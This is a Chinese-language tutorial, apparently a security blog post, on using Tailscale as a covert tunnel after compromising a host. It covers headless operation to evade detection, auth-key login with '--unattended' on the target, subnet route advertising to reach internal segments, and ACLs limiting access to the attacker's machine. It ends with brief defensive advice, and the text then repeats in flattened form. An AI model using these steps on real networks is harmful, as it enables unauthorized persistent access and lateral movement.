Tailscale在内网渗透中利用的研究
字数 1471 2025-08-25 22:58:35

Tailscale在内网渗透中的利用研究

一、Tailscale简介

Tailscale是一种基于WireGuard的多地组网软件,能够将多地主机聚合在一个虚拟局域网中,实现设备间的相互访问。所有节点采用P2P连接,具有以下特点:

  • 杀软检测规避:作为正常组网工具,不易被查杀
  • 流量隐蔽性:传输流量不易被安全设备识别
  • 跨平台支持:支持Windows、Linux等多种操作系统

二、基础使用

1. 账户注册

  1. 访问官网 https://tailscale.com/
  2. 点击"Use Tailscale for free"进行注册
  3. 支持多种登录方式(Google、GitHub、Microsoft等)

2. 程序安装

Windows安装:

  1. 下载Windows版本安装包
  2. 默认安装路径:C:\Program Files\Tailscale
  3. 主程序:tailscale-ipn.exe

Linux安装:

curl -fsSL https://tailscale.com/install.sh | sh

3. 设备接入

Windows设备接入:

  1. 运行tailscale-ipn.exe
  2. 点击"Log in"通过浏览器登录
  3. 登录成功后自动分配虚拟局域网IP

Linux设备接入:

tailscale up

访问生成的链接完成登录

三、内网渗透测试利用

1. 需要解决的问题

  1. 隐蔽性问题:图形界面暴露风险
  2. 登录问题:浏览器交互式登录不便
  3. 权限控制:双向访问风险
  4. 目标主机网段访问限制

2. 隐蔽性解决方案

命令行模式运行:

  1. 使用tailscaled.exe作为服务
    tailscaled.exe
    
  2. 使用tailscale.exe命令行工具
    tailscale up
    

特点:

  • 无图形界面显示
  • 完全通过命令行操作

3. 登录问题解决方案

使用Auth Key:

  1. 在管理面板生成Auth Key
    • Settings → Generate auth key
  2. 配置Auth Key属性:
    • Reusable:是否可重复使用
    • Expiration:过期时间
    • Ephemeral:临时设备标记
    • Tags:ACL策略标识

命令行登录:

sudo tailscale up --authkey [authkey]

4. 权限控制解决方案

ACL策略配置:

  1. 访问管理面板的"Access controls"标签
  2. 默认策略:允许所有访问
  3. 自定义策略示例:
    {
      "acls": [
        {"action": "accept", "src": ["100.127.21.76"], "dst": ["100.91.46.163:*"]}
      ]
    }
    
    表示只允许Kali(100.127.21.76)访问Windows(100.91.46.163)

5. 主机网段访问解决方案

子网路由配置:

Windows配置:

tailscale up --advertise-routes=10.0.0.0/24,10.0.1.0/24

Linux额外配置:

# 启用IP转发
echo 'net.ipv4.ip_forward = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
echo 'net.ipv6.conf.all.forwarding = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
sudo sysctl -p /etc/sysctl.d/99-tailscale.conf

# 广告路由
sudo tailscale up --advertise-routes=10.0.0.0/24,10.0.1.0/24

管理面板操作:

  1. 在设备列表中找到目标主机
  2. 点击"Edit route settings"
  3. 勾选需要开放的网段

四、攻击过程模拟

1. 文件上传

  1. 获取目标shell后上传必要文件:
    • tailscale.exe
    • tailscaled.exe
    • wintun.dll

2. 建立隧道

  1. 生成Auth Key并设置适当属性
  2. 目标主机执行:
    tailscaled.exe
    tailscale.exe up --authkey [authkey] --unattended
    

3. 访问控制配置

  1. 在管理面板配置ACL策略
  2. 限制目标主机只能被特定IP访问

4. 内网渗透

  1. 识别目标内网其他网段
  2. 配置子网路由扩大访问范围
  3. 进行进一步渗透测试

五、防御建议

  1. 监控异常网络连接
  2. 限制未授权设备接入内网
  3. 定期审计网络配置
  4. 加强对合法管理工具的监控

六、参考资源

  1. Tailscale官方文档:https://tailscale.com/kb/
  2. GitHub issues:https://github.com/tailscale/tailscale/issues/6610
  3. 相关研究:Breaking the Barriers of Segmentation (pentera.io)

注意:本文仅用于安全研究目的,禁止用于未经授权的渗透测试行为。

Tailscale在内网渗透中的利用研究 一、Tailscale简介 Tailscale是一种基于WireGuard的多地组网软件,能够将多地主机聚合在一个虚拟局域网中,实现设备间的相互访问。所有节点采用P2P连接,具有以下特点: 杀软检测规避:作为正常组网工具,不易被查杀 流量隐蔽性:传输流量不易被安全设备识别 跨平台支持:支持Windows、Linux等多种操作系统 二、基础使用 1. 账户注册 访问官网 https://tailscale.com/ 点击"Use Tailscale for free"进行注册 支持多种登录方式(Google、GitHub、Microsoft等) 2. 程序安装 Windows安装: 下载Windows版本安装包 默认安装路径: C:\Program Files\Tailscale 主程序: tailscale-ipn.exe Linux安装: 3. 设备接入 Windows设备接入: 运行 tailscale-ipn.exe 点击"Log in"通过浏览器登录 登录成功后自动分配虚拟局域网IP Linux设备接入: 访问生成的链接完成登录 三、内网渗透测试利用 1. 需要解决的问题 隐蔽性问题:图形界面暴露风险 登录问题:浏览器交互式登录不便 权限控制:双向访问风险 目标主机网段访问限制 2. 隐蔽性解决方案 命令行模式运行: 使用 tailscaled.exe 作为服务 使用 tailscale.exe 命令行工具 特点: 无图形界面显示 完全通过命令行操作 3. 登录问题解决方案 使用Auth Key: 在管理面板生成Auth Key Settings → Generate auth key 配置Auth Key属性: Reusable:是否可重复使用 Expiration:过期时间 Ephemeral:临时设备标记 Tags:ACL策略标识 命令行登录: 4. 权限控制解决方案 ACL策略配置: 访问管理面板的"Access controls"标签 默认策略:允许所有访问 自定义策略示例: 表示只允许Kali(100.127.21.76)访问Windows(100.91.46.163) 5. 主机网段访问解决方案 子网路由配置: Windows配置: Linux额外配置: 管理面板操作: 在设备列表中找到目标主机 点击"Edit route settings" 勾选需要开放的网段 四、攻击过程模拟 1. 文件上传 获取目标shell后上传必要文件: tailscale.exe tailscaled.exe wintun.dll 2. 建立隧道 生成Auth Key并设置适当属性 目标主机执行: 3. 访问控制配置 在管理面板配置ACL策略 限制目标主机只能被特定IP访问 4. 内网渗透 识别目标内网其他网段 配置子网路由扩大访问范围 进行进一步渗透测试 五、防御建议 监控异常网络连接 限制未授权设备接入内网 定期审计网络配置 加强对合法管理工具的监控 六、参考资源 Tailscale官方文档:https://tailscale.com/kb/ GitHub issues:https://github.com/tailscale/tailscale/issues/6610 相关研究:Breaking the Barriers of Segmentation (pentera.io) 注意:本文仅用于安全研究目的,禁止用于未经授权的渗透测试行为。